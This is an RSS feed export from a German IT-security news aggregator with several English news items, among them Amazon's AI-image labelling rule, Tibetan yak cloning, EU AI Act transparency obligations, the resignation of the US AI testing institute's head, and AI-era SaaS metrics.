<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=transparency+trap%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Sat, 01 Aug 2026 08:40:03 +0200</lastBuildDate>
<pubDate>Sat, 01 Aug 2026 08:40:03 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=transparency+trap%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=transparency+trap%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Amazon Cracks Down On Use of AI Images By Sellers]]></title>
<description><![CDATA[CNBC reports:


Amazon is requiring that third-party sellers label any product images or videos that contain "AI-generated people" after New York recently passed a law mandating greater transparency around "synthetic performers" in ads... The policy directs sellers to tag images [and videos or ot...]]></description>
<link>https://tsecurity.de/de/3694903/it-security-nachrichten/amazon-cracks-down-on-use-of-ai-images-by-sellers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694903/it-security-nachrichten/amazon-cracks-down-on-use-of-ai-images-by-sellers/</guid>
<pubDate>Sat, 25 Jul 2026 22:16:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CNBC reports:


Amazon is requiring that third-party sellers label any product images or videos that contain "AI-generated people" after New York recently passed a law mandating greater transparency around "synthetic performers" in ads... The policy directs sellers to tag images [and videos or other graphics on listing pages] with specific metadata keywords before they're uploaded. "Recent legislation requires disclosure when images or videos in advertisements contain photorealistic AI-generated people," Amazon wrote in the announcement [clarifying that the requirement doesn't apply to content featuring TV/video game/movie characters or content including real people, even if they've been altered using AI]. The company said it will "add an indicator" to listings on its website, informing consumers that images or other content feature AI-generated people, "where applicable." It's unclear what criteria Amazon will apply when deciding when to display the label to shoppers... 

Amazon has embraced AI internally and it's increasingly infusing the technology across its portfolio. The company has optimized listing titles and details so they're more likely to be spotted by AI systems, invested in a recently rebranded assistant called Alexa for Shopping, and launched a feature that injects AI-generated [images of] products into its search bar in real time based on user queries. More Amazon third-party sellers are using AI to generate text, images and other content for their listings, partly by using the company's tools. 

Outside sellers account for more than 60% of goods sold on Amazon, the article points out. It adds that there's currently no nationwide U.S. law requiring companies to disclose AI-generated advertising content, it adds — but YouTube, Meta, Pinterest, and TikTok have already added labels for AI-generated content. 

And a new California law also requires large AI providers to embed watermarks in AI-generated images, video and other content...<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Amazon+Cracks+Down+On+Use+of+AI+Images+By+Sellers%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F25%2F0545246%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F25%2F0545246%2Famazon-cracks-down-on-use-of-ai-images-by-sellers%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/25/0545246/amazon-cracks-down-on-use-of-ai-images-by-sellers?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China is Creating a Herd of 100 Elite Yak Clones]]></title>
<description><![CDATA[CNN reports on yaks "designed and cloned" in secretive, high-altitude labs in Tibet — 2.4 miles (4,000 meters) above sea level. They're a critical part of the local economy, and researchers "hope to create an 'elite' herd of super-yaks, healthier and more fertile than their predecessors."



Both...]]></description>
<link>https://tsecurity.de/de/3694805/it-security-nachrichten/china-is-creating-a-herd-of-100-elite-yak-clones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694805/it-security-nachrichten/china-is-creating-a-herd-of-100-elite-yak-clones/</guid>
<pubDate>Sat, 25 Jul 2026 20:01:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CNN reports on yaks "designed and cloned" in secretive, high-altitude labs in Tibet — 2.4 miles (4,000 meters) above sea level. They're a critical part of the local economy, and researchers "hope to create an 'elite' herd of super-yaks, healthier and more fertile than their predecessors."



Both domestic yaks and their wild cousins have been facing threats for years, with some rare subspecies at risk of disappearing entirely. Authorities in the southwestern Chinese region have poured tens of millions of dollars into boosting the yak industry in recent years — and they hope cloning can help. The first yak clone came in July 2025, Chinese state media hailing it as a breakthrough achievement that combined cloning with gene selection. More clones were born this spring — and researchers are now aiming to create a herd of more than 100 "elite" yak clones by 2028, boasting desired traits like faster growth and larger size. "This shows the technology has moved from a one-time success to a stable, mass-scale application," said Fang Shengguo, the project's scientific lead and director of the State Conservation Center for Gene Resources of Endangered Wildlife, according to state-run news agency Xinhua... 


Many experts acknowledge there are legitimate arguments for using cloning in conservation, and for gene selection in farming. But the ethical waters are murky, and any such project should have high levels of public transparency and accountability, said Lisa Moses, a veterinarian and bioethicist at Harvard Medical School. So far, much of the yak cloning project remains mysterious, with information largely limited to glowing state-media coverage... 


[S]ome scientists say these projects reduce our sense of urgency toward fixing the environment, and that we can't simply churn out clones while the planet burns. To truly enact change, they say, we have to continue addressing the root cause of the problem — restoring degraded habitats, lowering carbon emissions, cracking down on poaching, and more. But for others, "there is a strong feeling ... that traditional conservation is essentially failing now," Moses said. "What we've been doing for the last 100 years to try to stave off ecological destruction is not working.... The argument is, we don't have a choice," she added. "If we want to try to do something that will actually make a difference, we need to use these technologies, specifically synthetic biology, to essentially override evolution and change the fitness of the species for the environment that they live in." 

"History is littered with good intentions in the environment gone wrong," Moses said, "and I would argue that these technologies have even more unknowns than ones that we previously employed."

 

The article points out that the number of wild yaks "dropped more than a third in the last 30 years,
with just 10,000 to 20,000 individuals left, according to the Wildlife Conservation Society." 


The yaks are threatened by climate change and habitat degradation, "with warmer temperatures bringing invasive plant species and increased competition for resources... in one of the world's most inhospitable terrains."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=China+is+Creating+a+Herd+of+100+Elite+Yak+Clones%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F25%2F1656259%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F25%2F1656259%2Fchina-is-creating-a-herd-of-100-elite-yak-clones%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/25/1656259/china-is-creating-a-herd-of-100-elite-yak-clones?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694779/ai-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:13 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



<h2 class="wp-block-heading">A consistent code of practice</h2>



<p class="wp-block-paragraph">Along with the transparency guidelines, the Commission has introduced a <a href="https://digital-strategy.ec.europa.eu/en/policies/code-practice-ai-generated-content" target="_blank" rel="noreferrer noopener">code of practice</a> that essentially serves as a gesture of good faith. When signed, it can provide “legal certainty” and a “simple and practical” way to demonstrate compliance with the <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">AI Act</a>, according to the Commission. Signatories can also collaborate through the ‘Signatory Taskforce,’ which will share practices and advance technologies around marking and labeling practices.</p>



<p class="wp-block-paragraph">Providers that choose not to sign must comply through other methods and demonstrate that those methods are “adequate” through assessment by surveillance authorities, according to the Commission.</p>



<p class="wp-block-paragraph">Non-signatories “keep their flexibility, and will face more case-by-case scrutiny for it,” said Gogia.</p>



<h2 class="wp-block-heading">Criteria for compliance </h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, pointed out that the transparency requirements apply to content only when three criteria are met: It has been published, is informative to the public, or is on matters of public interest.</p>



<p class="wp-block-paragraph">B2B business content or blogs may not need an AI disclosure if they do not meet these criteria, he noted. Also, published text that has undergone human review or is under editorial control does not need to be labeled. Editorial control means that a person must hold the ultimate legal responsibility for the publication of the content.</p>



<p class="wp-block-paragraph">Many companies like Google, Adobe, and LinkedIn have already established ways to identify images marked as AI-generated. Meta has made it a requirement, but the creator has to add the AI-generated label, Bellamkonda said.</p>



<p class="wp-block-paragraph">“This is a good move for <a href="https://www.computerworld.com/article/4164963/eu-lawmakers-fail-to-agree-on-watered-down-ai-act-talks-pushed-to-may.html" target="_blank">guardrails</a> around public information, and companies with good compliance and ethical oversight may not have to worry about this,” he noted. But as a general practice, companies should disclose AI-generated content and state whether it has been human reviewed.</p>



<h2 class="wp-block-heading">Creating a transparency pipeline</h2>



<p class="wp-block-paragraph">Establishing full transparency means identifying who carries the responsibility for the content, whether the marking survives real use, not just testing, and what evidence will defend the decision, Gogia said.</p>



<p class="wp-block-paragraph">Concerns cluster around responsibility, durability and evidence. Several organizations usually touch one piece of content, and none controls the whole chain, which is why contracts become the “pressure point,” he said. Most current agreements were written to deliver software and say “almost nothing” about provenance persistence, verification access, or evidence retention.</p>



<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[US AI testing institute chief steps down within three months]]></title>
<description><![CDATA[The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.



Curr...]]></description>
<link>https://tsecurity.de/de/3694777/ai-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694777/ai-nachrichten/us-ai-testing-institute-chief-steps-down-within-three-months/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The head of the US government’s AI testing institute, Chris Fall, has resigned about three months after taking charge of the Center for AI Standards and Innovation (CAISI), the federal organization responsible for evaluating advanced artificial intelligence models for safety and security.</p>



<p class="wp-block-paragraph">Current National Institute of Standards and Technology NIST Director Arvind Raman will serve as acting CAISI Director following Fall’s departure while continuing to oversee the Commerce Department office responsible for the institute, the Daily Signal <a href="https://www.dailysignal.com/2026/07/20/scoop-head-of-federal-ai-safety-org-resigns/" target="_blank" rel="noreferrer noopener">reported</a>, citing two people familiar with the matter.</p>



<p class="wp-block-paragraph">A Commerce Department spokesperson who spoke to the publication did not disclose a reason for the resignation.</p>



<p class="wp-block-paragraph">Fall assumed leadership of CAISI in April after the Trump administration reorganized the former US AI Safety Institute under NIST. The institute develops methodologies for evaluating frontier AI models and works with AI developers on voluntary technical assessments covering areas such as cybersecurity, model misuse, reliability and other risks associated with increasingly capable AI systems.</p>



<p class="wp-block-paragraph">The leadership change comes as governments and AI companies continue developing technical approaches for evaluating frontier AI models while enterprises expand deployments of generative AI and agentic AI across business operations.</p>



<p class="wp-block-paragraph">In recent months, the Commerce Department has taken a <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html?_conv_v=vi:1*sc:1*cs:1784634320*fs:1784634320*pv:1*exp:%7B1004203305.%7Bv.1004477672-g.%7B%7D%7D%7D*seg:%7B%7D&amp;_conv_s=sh:1784634319808-0.24259838933788935*si:1*pv:1&amp;_conv_r=null&amp;_conv_sptest=null">more active role</a> in AI policy involving advanced models, placing greater attention on how the federal government evaluates technologies with potential national security implications.</p>



<h2 class="wp-block-heading">Continuity matters more than personalities</h2>



<p class="wp-block-paragraph">CAISI works with AI developers such as Anthropic, Google’s DeepMind and OpenAI on voluntary evaluations of frontier AI models and develops methodologies for testing model capabilities and risks. The institute does not regulate AI developers or certify commercial AI systems.</p>



<p class="wp-block-paragraph">For enterprises, those evaluations are one source of technical information alongside vendors’ own testing, third-party security assessments and internal AI governance programs.</p>



<p class="wp-block-paragraph">Sanchit Vir Gogia, chief analyst at Greyhound Research, said enterprises should focus less on the individual leading the institute and more on whether its technical work continues with the same level of consistency and transparency.</p>



<p class="wp-block-paragraph">“Leadership churn at CAISI weakens the signal long before it weakens the science,” Gogia said. “The testing has not stopped. Its authority simply does not travel as cleanly once the leadership does not.”</p>



<p class="wp-block-paragraph">According to Gogia, the more important question for enterprises is not whether the institute’s evaluation work will continue but whether the processes supporting those evaluations remain stable.</p>



<p class="wp-block-paragraph">“The instinct is to ask whether the pipeline is breaking,” he said. “The more useful question is where the pipeline now sits.”</p>



<h2 class="wp-block-heading">Enterprises still carry the burden of AI governance</h2>



<p class="wp-block-paragraph">Gogia said organizations should continue treating government-led AI evaluations as one input into their governance processes rather than as evidence that a model is inherently safe for enterprise deployment.</p>



<p class="wp-block-paragraph">“A government evaluation was always a signal, never a certificate,” he said. “A signal loses value the moment its issuer becomes unpredictable.”</p>



<p class="wp-block-paragraph">He said enterprises should instead monitor whether CAISI maintains consistent evaluation methodologies, continues publishing technical findings and preserves continuity within its research teams under interim leadership.</p>



<p class="wp-block-paragraph">“The name on the door is not the signal. The behaviour underneath it is,” Gogia said.</p>



<p class="wp-block-paragraph">Gogia also cautioned against linking Fall’s resignation to recent Commerce Department actions involving AI policy or export controls, noting that there is no public evidence connecting the two.</p>



<p class="wp-block-paragraph">“CAISI evaluates; it does not enforce export controls, because it holds no such power,” he said. “This is not a testing body reaching for enforcement. It is enforcement reaching past the testing body.”</p>



<p class="wp-block-paragraph">With Raman assuming the role on an interim basis, the next significant milestone for enterprises will be the appointment of a permanent director, and whether the institute’s evaluation programs continue without disruption, the analyst said.</p>



<p class="wp-block-paragraph">Gogia said the successor’s mandate may prove more important than the individual selected.</p>



<p class="wp-block-paragraph">“A CAISI result is not a safe harbour,” he said. “It informs an obligation; it does not discharge one.” NIST did not immediately respond to a request for comment.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[That data breach alert might be a trap]]></title>
<description><![CDATA[Ignoring a real breach notification invites risk, but falling for a bogus one could be even worse. Stop reacting on autopilot.]]></description>
<link>https://tsecurity.de/de/3694651/malware-trojaner-viren/that-data-breach-alert-might-be-a-trap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694651/malware-trojaner-viren/that-data-breach-alert-might-be-a-trap/</guid>
<pubDate>Sat, 25 Jul 2026 19:04:35 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ignoring a real breach notification invites risk, but falling for a bogus one could be even worse. Stop reacting on autopilot.]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



